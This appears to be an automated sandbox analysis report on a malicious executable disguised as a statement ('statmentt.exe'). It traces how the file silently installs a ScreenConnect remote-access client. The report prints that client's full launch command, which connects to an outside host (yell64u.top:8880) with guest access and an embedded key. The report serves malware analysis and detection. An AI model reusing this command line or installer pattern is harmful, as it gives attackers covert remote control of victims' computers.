                              Source: rundll32.exe, 00000004.00000003.1797343933.0000000004203000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000437C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1797154534.000000000430D000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.WindowsInstaller.dll.4.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.4.dr, Microsoft.Deployment.Compression.dll.4.dr, Microsoft.Deployment.Compression.Cab.dll.4.drString found in binary or memory: http://wixtoolset.org/releases/
                              Source: statmentt.exe, ScreenConnect.WindowsBackstageShell.exe.2.dr, ScreenConnect.ClientService.exe.2.dr, ScreenConnect.WindowsFileManager.exe.2.dr, ScreenConnect.WindowsAuthenticationPackage.dll.2.dr, ScreenConnect.WindowsClient.exe.2.dr, ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: ScreenConnect.WindowsCredentialProvider.dll.2.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                              Source: ScreenConnect.Core.dll.2.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

                              Spam, unwanted Advertisements and Ransom Demands

                              barindex
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SecurityJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\SystemJump to behavior

                              System Summary

                              barindex
                              Source: statmentt.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 7_2_058301F0 CreateProcessAsUserW,7_2_058301F0
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\68f199.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{2750A569-82DB-B303-FEC6-22A2E87A0AD0}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF458.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF488.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF739.tmpJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\68f19b.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\68f19b.msiJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{2750A569-82DB-B303-FEC6-22A2E87A0AD0}Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{2750A569-82DB-B303-FEC6-22A2E87A0AD0}\DefaultIconJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{2750A569-82DB-B303-FEC6-22A2E87A0AD0}.SchedServiceConfig.rmiJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\d20awlgx.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (de5851ad6e374ce3)\d20awlgx.newcfgJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.logJump to behavior
                              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIF488.tmpJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B286FE88_2_00007FFD9B286FE8
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B595BC18_2_00007FFD9B595BC1
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B5962838_2_00007FFD9B596283
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 8_2_00007FFD9B596C908_2_00007FFD9B596C90
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B2870BA9_2_00007FFD9B2870BA
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B2810CF9_2_00007FFD9B2810CF
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B2810D79_2_00007FFD9B2810D7
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B5907909_2_00007FFD9B590790
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B5930249_2_00007FFD9B593024
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B59E6C69_2_00007FFD9B59E6C6
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B595F169_2_00007FFD9B595F16
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B5971859_2_00007FFD9B597185
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B59F4729_2_00007FFD9B59F472
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B5930589_2_00007FFD9B593058
                              Source: statmentt.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statmentt.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statmentt.exeStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statmentt.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statmentt.exeStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Source: statmentt.exe, 00000000.00000002.1799693948.00000000057C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1799967396.0000000005880000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1785114133.00000000031E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000000.1770182468.00000000010FF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000000.1770182468.00000000010FF000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1800368521.0000000005910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1800368521.0000000005910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1800368521.0000000005910000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1805924835.0000000008038000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1805802815.0000000007060000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsiexec.exe.muiX vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1798027712.0000000004413000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1802003851.0000000005CCC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1802003851.0000000005CCC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSfxCA.dllL vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1802003851.0000000005CCC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamewixca.dll\ vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000002.1802003851.0000000005CCC000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibwebp.dllB vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamezlib.dll2 vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statmentt.exe
                              Source: statmentt.exe, 00000000.00000000.1770182468.0000000000BD6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenameScreenConnect.Core.dll< vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenamelibwebp.dllB vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenamezlib.dll2 vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenameSfxCA.dllL vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenamewixca.dll\ vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs statmentt.exe
                              Source: statmentt.exeBinary or memory string: OriginalFilenameDotNetResolver.exe4 vs statmentt.exe
                              Source: statmentt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: 0.2.statmentt.exe.5880000.2.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                              Source: 0.0.statmentt.exe.bd63d8.2.raw.unpack, CursorBuffer.csCryptographic APIs: 'TransformBlock'
                              Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.2.statmentt.exe.5910000.5.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                              Source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                              Source: 0.0.statmentt.exe.c5c3d8.3.raw.unpack, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                              Source: classification engineClassification label: mal48.evad.winEXE@17/56@1/1
                              Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)Jump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\statmentt.exe.logJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeMutant created: NULL
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                              Source: C:\Users\user\Desktop\statmentt.exeFile created: C:\Users\user\AppData\Local\Temp\ScreenConnectJump to behavior
                              Source: statmentt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: statmentt.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                              Source: C:\Users\user\Desktop\statmentt.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6876625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: statmentt.exeReversingLabs: Detection: 21%
                              Source: statmentt.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
                              Source: statmentt.exeString found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2)
                              Source: C:\Users\user\Desktop\statmentt.exeFile read: C:\Users\user\Desktop\statmentt.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\statmentt.exe "C:\Users\user\Desktop\statmentt.exe"
                              Source: C:\Users\user\Desktop\statmentt.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"
                              Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8DDF4D7DFA864A88ED87F00705A0EDAF C
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6876625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6D5F870693EF3B6FD3A6AF241B788648
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B9FCDEB162140880EF803EB7EC0353E8 E Global\MSI0000
                              Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=yell64u.top&p=8880&s=07e04c0f-eabe-4658-9ea3-184f7035898e&k=BgIAAACkAABSU0ExAAgAAAEAAQDFK%2fbbpI2Y%2fu64InmNUalvSiNHiKj3qIxef2EBlhKtkMB9Wafgho8PWjl0LvYg9kGVGB%2fBBr7p8upYBqQwJmt2zG9vyAgxlCJY%2fd8W0%2b7tfbGG8gffcJoob3TupNzbeTnvs8%2bYbOTMzzSmg6IjYNBlXj1GtcaHumWR1u8JKfXSyvPzRXOHBR31dMIBtzi1NUnrYf8XA6QXSktBM1h0AQGBZR6FzuZymqeKrjktwq2%2fXUP3dLZ4EN6BZ1k0oNlkviz5vhj3h597IjpGkjLbhfTFC4T%2btt%2bNCv6zQw83IWwtZXibTXf7nMUVQ0n4fF2lKmh5FLU07mqW%2fY38%2b5MO41XA&c=IT&c=&c=&c=IT%20team&c=&c=&c=&c="
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "15e3aa5a-03ad-43c1-8c56-797fd84cc894" "User"
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "5082607d-6583-424c-b175-f03711434b52" "System"
                              Source: C:\Users\user\Desktop\statmentt.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\de5851ad6e374ce3\setup.msi"Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 8DDF4D7DFA864A88ED87F00705A0EDAF CJump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6D5F870693EF3B6FD3A6AF241B788648Jump to behavior
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B9FCDEB162140880EF803EB7EC0353E8 E Global\MSI0000Jump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIEC0B.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6876625 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "15e3aa5a-03ad-43c1-8c56-797fd84cc894" "User"Jump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe" "RunRole" "5082607d-6583-424c-b175-f03711434b52" "System"Jump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\statmentt.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dllJump to behavior
                              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
